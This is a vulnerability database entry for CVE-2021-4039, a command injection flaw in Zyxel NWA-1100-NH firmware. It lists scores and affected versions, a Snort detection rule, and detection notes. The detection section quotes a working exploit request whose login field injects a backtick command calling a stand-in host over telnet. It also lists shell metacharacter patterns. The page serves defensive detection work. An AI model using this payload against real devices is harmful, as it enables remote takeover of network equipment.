cbcvebase.
CVE-2021-4039
published 2022-03-01

CVE-2021-4039: A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
71.05%
99.3th percentile
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.

Affected

2 ranges
VendorProductVersion rangeFixed in
zyxelnwa1100-nh_firmware< 2.12\(aasi.3\)c02.12\(aasi.3\)c0
zyxelnwa1100-nh_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/login/login.html
port8081
commandmyname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:17; content:"/login/login.html"; fast_pattern; http.request_body; content:"myname="; content:"mypasswd="; content:"Submit=Login"; pcre:"/myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/i"; reference:url,www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,www.exploit-db.com/exploits/50870; reference:cve,2021-4039; classtype:attempted-admin; sid:2036737; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_01, cve CVE_2021_4039, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_26, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit targets POST requests to /login/login.html on port 8081 with shell metacharacters (backtick, semicolon, pipe, ampersand) injected into the `myname` parameter of the login form body.
  • Detect injection by inspecting the `myname` POST body field for URL-encoded or raw shell metacharacters: %60 (backtick), %3b (semicolon), %7c (pipe), %26 (ampersand), as well as command substitution patterns like $( or <(.
  • The exploit payload uses backtick-enclosed OS commands (e.g., `id|telnet yourserverhere 21`) to achieve out-of-band command execution via a reverse telnet connection, which can be used as a callback indicator.
  • The ET rule (sid:2036737) requires all three body tokens — myname=, mypasswd=, and Submit=Login — to be present simultaneously, reducing false positives while matching the exact login form structure.
  • URI match should enforce exact byte size of 17 for /login/login.html to avoid matching longer paths that merely contain this string.
  • ·The ET rule is tagged for Perimeter and SSLDecrypt deployments, meaning it will miss exploitation attempts over HTTPS unless TLS inspection is enabled.
  • ·All firmware versions before 2.12 are affected; patched version is NWA1100-NH_2.12(AASI.3)C0.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.